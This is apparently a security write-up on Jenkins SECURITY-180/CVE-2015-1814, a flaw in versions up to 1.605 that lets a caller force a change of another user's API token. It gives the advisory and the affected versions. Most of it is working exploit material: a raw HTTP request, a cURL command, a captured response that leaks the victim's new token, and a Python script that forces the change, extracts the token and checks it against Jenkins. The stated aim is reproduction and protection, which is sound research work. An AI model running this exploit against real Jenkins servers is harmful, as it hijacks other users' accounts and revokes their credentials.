Jenkins Security Vulnerability Analysis: SECURITY-180/CVE-2015-1814 PoC Walkthrough

This post analyses Jenkins SECURITY-180/CVE-2015-1814, provides a PoC request and a way to verify the result, and is aimed at security researchers and DevOps engineers who need to reproduce the issue or protect against it.

Jenkins - SECURITY-180/CVE-2015-1814 PoC

Forced API token change

SECURITY-180/CVE-2015-1814
Official advisory: https://jenkins.io/security/advisory/2015-03-23/#security-180cve-2015-1814-forced-api-token-change

The per-user changeToken action of jenkins.security.ApiTokenProperty can be invoked for another user's account, which regenerates that user's API token. As the capture below shows, the response also carries the newly generated token, so the caller ends up holding a valid token for the victim account and every token the victim previously issued stops working.

Affected versions

  • All Jenkins main-line releases <= 1.605
  • All LTS releases <= 1.596.1

The advisory lists the fix in Jenkins 1.606 and LTS 1.596.2.

PoC test environment

Target: Jenkins 1.605

Example HTTP request

The request below is sent without any credentials and without a Jenkins crumb, so the test instance had CSRF protection turned off; on an instance that enforces crumbs, a POST without a valid crumb header is rejected and the request would have to carry one. The user whose token is regenerated is the one named in the URL path (user2), not the requester.

POST /user/user2/descriptorByName/jenkins.security.ApiTokenProperty/changeToken HTTP/1.1
Host: 10.0.0.160
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:36.0) Gecko/20100101 Firefox/36.0
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
X-Prototype-Version: 1.7
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: https://10.0.0.160:8080/asynchPeople/
Content-Length: 8
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

=user2

cURL version

curl -i -s -k -X POST \
    -H 'Host: 10.0.0.160' \
    -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:36.0) Gecko/20100101 Firefox/36.0' \
    -H 'Accept: text/javascript, text/html, application/xml, text/xml, */*' \
    -H 'Accept-Language: en-US,en;q=0.5' \
    -H 'Accept-Encoding: gzip, deflate' \
    -H 'X-Requested-With: XMLHttpRequest' \
    -H 'X-Prototype-Version: 1.7' \
    -H 'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' \
    -H 'Referer: https://10.0.0.160/asynchPeople/' \
    -H 'Content-Length: 8' \
    -H 'Connection: keep-alive' \
    -H 'Pragma: no-cache' \
    -H 'Cache-Control: no-cache' \
    --data-binary $'=user2\x0d\x0a' \
    'http://10.0.0.160:8080/user/user2/descriptorByName/jenkins.security.ApiTokenProperty/changeToken'

Response

The new token for user2 is returned in the script response header (the value the Jenkins UI would write into the apiToken field of the user's configuration page):

HTTP/1.1 200 OK
script: document.getElementById('apiToken').value='29a087f1e29620e105385b7599bffd20'
Content-Type: text/html;charset=UTF-8
Content-Length: 19
Server: Jetty(winstone-2.8)

<div>Updated</div>

Verifying the new token

Once a new API token has been obtained, confirm that Jenkins actually accepts it. Jenkins accepts username:apitoken as HTTP Basic credentials, so any authenticated request made with user2 and the token from the script header should be answered as user2.
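As an added example that is not part of the original post, the following Python script reproduces the request above, extracts the token from the script response header and then checks it against Jenkins. The host, the target user name, the optional crumb handling and the use of /whoAmI/api/json for the check are assumptions for a lab instance; the token pattern is taken from the 32-character hex value shown in the captured response.

```python
"""Added example, not code from the original post: reproduce the SECURITY-180
changeToken request and verify that the returned API token is accepted."""
import base64
import json
import re
import urllib.request

# Assumed lab target; the captured request in the post used http://10.0.0.160:8080.
JENKINS = "http://10.0.0.160:8080"
TARGET_USER = "user2"

# Jenkins 1.605 answers changeToken with a header of the form
#   script: document.getElementById('apiToken').value='<32 hex chars>'
# The 32-hex-character shape is the legacy token format seen in the capture.
TOKEN_HEADER_RE = re.compile(r"value='([0-9a-f]{32})'")


def extract_token(script_header):
    """Pull the new API token out of the 'script' response header.
    Returns None when the header is missing or carries no token."""
    if not script_header:
        return None
    m = TOKEN_HEADER_RE.search(script_header)
    return m.group(1) if m else None


def changetoken_url(base, user):
    """URL of the changeToken action for the user named in the path."""
    return "%s/user/%s/descriptorByName/jenkins.security.ApiTokenProperty/changeToken" % (
        base.rstrip("/"), user)


def force_token_change(base, user, crumb=None):
    """POST to changeToken without credentials and return the new token.

    crumb: optional (header_name, value) pair for instances that enforce CSRF
    crumbs (assumption: obtained from /crumbIssuer/api/json beforehand)."""
    # Body mirrors the captured request; the victim is taken from the URL path.
    body = b"=" + user.encode() + b"\r\n"
    req = urllib.request.Request(changetoken_url(base, user), data=body, method="POST")
    req.add_header("Content-Type", "application/x-www-form-urlencoded; charset=UTF-8")
    req.add_header("X-Requested-With", "XMLHttpRequest")
    if crumb:
        req.add_header(crumb[0], crumb[1])
    with urllib.request.urlopen(req) as resp:
        return extract_token(resp.headers.get("script"))


def basic_auth_header(user, token):
    """Jenkins accepts 'user:apitoken' as HTTP Basic credentials."""
    raw = ("%s:%s" % (user, token)).encode()
    return "Basic " + base64.b64encode(raw).decode()


def whoami(base, user, token):
    """Call /whoAmI/api/json with the token; return (authenticated, name)."""
    req = urllib.request.Request(base.rstrip("/") + "/whoAmI/api/json")
    req.add_header("Authorization", basic_auth_header(user, token))
    with urllib.request.urlopen(req) as resp:
        info = json.load(resp)
    return bool(info.get("authenticated")), info.get("name")


def token_is_valid(base, user, token):
    """True only if Jenkins authenticates the token as the expected user."""
    authenticated, name = whoami(base, user, token)
    return authenticated and name == user


if __name__ == "__main__":
    token = force_token_change(JENKINS, TARGET_USER)
    print("new token for %s: %s" % (TARGET_USER, token))
    if token:
        print("token accepted by Jenkins:", token_is_valid(JENKINS, TARGET_USER, token))
```

On a patched instance the POST fails the permission check and force_token_change raises urllib.error.HTTPError instead of returning a token, which is the quickest way to tell a fixed Jenkins from a vulnerable one in a lab.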
